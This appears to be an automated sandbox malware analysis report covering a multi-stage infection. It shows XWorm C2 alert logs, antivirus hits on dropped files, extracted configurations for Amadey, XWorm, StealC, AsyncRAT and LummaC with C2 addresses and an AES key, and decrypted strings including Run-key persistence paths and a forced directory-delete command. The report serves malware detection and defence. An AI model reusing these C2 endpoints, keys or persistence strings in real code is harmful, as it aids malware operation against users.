2025-02-01T17:22:02.628291+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:06.384355+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:12.394486+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:16.055018+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:20.826504+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:21.231842+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:29.919335+0100	2852870	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:54.116860+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:20:56.907390+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.018507+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.128095+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.237408+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.346598+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.500456+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.621173+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.735301+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.863592+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.073246+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.178187+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.287650+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.399304+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.507812+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.615622+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.725303+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.834615+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.943827+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.053178+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.164131+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.294022+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.412483+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.522177+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.631677+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.740802+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.853832+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.960543+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.068151+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.176374+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.284689+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.396571+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.505922+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.615226+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.724571+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.833809+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.945756+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.057995+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.190051+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.619334+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.736313+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.843264+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.960706+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.074387+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.186728+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.300827+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.422496+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.529922+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.636020+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.744529+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.851249+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.961704+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.070862+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.182540+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.323423+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.445539+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.454946+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:21:03.555555+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.683593+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.790976+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.900780+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.033377+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.196216+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.299910+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.413279+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.522424+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.631383+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:13.883324+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:21:24.558735+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:21:34.754701+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:21:45.379979+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:21:55.718688+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:02.630105+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:12.411062+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:16.059762+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:20.828962+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:21.233930+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP
2025-02-01T17:22:30.002069+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:21:05.877716+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:21:35.838773+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP
2025-02-01T17:22:06.384355+0100	2852874	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:56.907390+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.018507+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.128095+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.237408+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.346598+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.500456+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.621173+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.735301+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:57.863592+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.073246+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.178187+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.287650+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.399304+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.507812+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.615622+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.725303+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.834615+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:58.943827+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.053178+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.164131+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.294022+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.412483+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.522177+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.631677+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.740802+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.853832+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:20:59.960543+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.068151+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.176374+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.284689+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.396571+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.505922+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.615226+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.724571+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.833809+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:00.945756+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.057995+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.190051+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.619334+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.736313+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.843264+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:01.960706+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.074387+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.186728+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.300827+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.422496+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.529922+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.636020+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.744529+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.851249+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:02.961704+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.070862+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.182540+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.323423+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.445539+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.555555+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.683593+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.790976+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:03.900780+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.033377+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.196216+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.299910+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.413279+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.522424+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP
2025-02-01T17:21:04.631383+0100	2852873	1	Malware Command and Control Activity Detected	192.168.2.5	50139	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:21:13.647370+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:49.269783+0100	2853191	1	Malware Command and Control Activity Detected	91.212.166.99	4404	192.168.2.5	50064	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-01T17:20:48.926424+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.5	50064	91.212.166.99	4404	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SQ1NgqeTQy.exe

Avira: detected

Antivirus detection for URL or domain

Source: breakfasutwy.cyou	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.php%	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/ws	Avira URL Cloud: Label: malware
Source: http://185.215.113.115/c4becf79229cb002.phpW	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000001D.00000002.4578058970.0000000002561000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Xworm {"C2 url": ["91.212.166.99"], "Port": 4404, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: 00000003.00000002.2262935516.00000000018CE000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.115/c4becf79229cb002.php"}
Source: 52.2.MSBuild.exe.bc0000.0.unpack	Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "159.100.19.137", "Ports": "7707", "Version": "0.5.8", "Autorun": "false", "Install_Folder": "svchost.exe", "Install_File": "MTZ4cVRldGczWDFoSHVwbHNqYlc2ZE9GUXRheUlEdnY="}
Source: f35b37b5a5.exe.4320.23.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["breakfasutwy.cyou", "miniatureyu.lat", "finickypwk.lat", "washyceehsu.lat", "bloodyswif.lat", "leggelatez.lat", "savorraiykj.lat", "shoefeatthe.lat", "kickykiduz.lat"], "Build id": "3sf--"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	ReversingLabs: Detection: 58%
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Roaming\is-KKQ75.tmp	ReversingLabs: Detection: 83%
Source: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)	ReversingLabs: Detection: 83%

Multi AV Scanner detection for submitted file

Source: SQ1NgqeTQy.exe	Virustotal: Detection: 62%			Perma Link
Source: SQ1NgqeTQy.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1062165001\52d42007e3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SQ1NgqeTQy.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 185.215.113.43
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: S-%lu-
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: abc3bc1985
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: skotes.exe
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Startup
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: rundll32
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Programs
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: %USERPROFILE%
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: cred.dll
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: clip.dll
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: http://
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: https://
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /quiet
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: /Plugins/
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: &unit=
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: shell32.dll
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: kernel32.dll
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: ProgramData\
Source: 00000005.00000003.2289988609.00000000050F0000.00000004.00001000.00020000.00000000.sdmp	String decryptor: AVAST Software
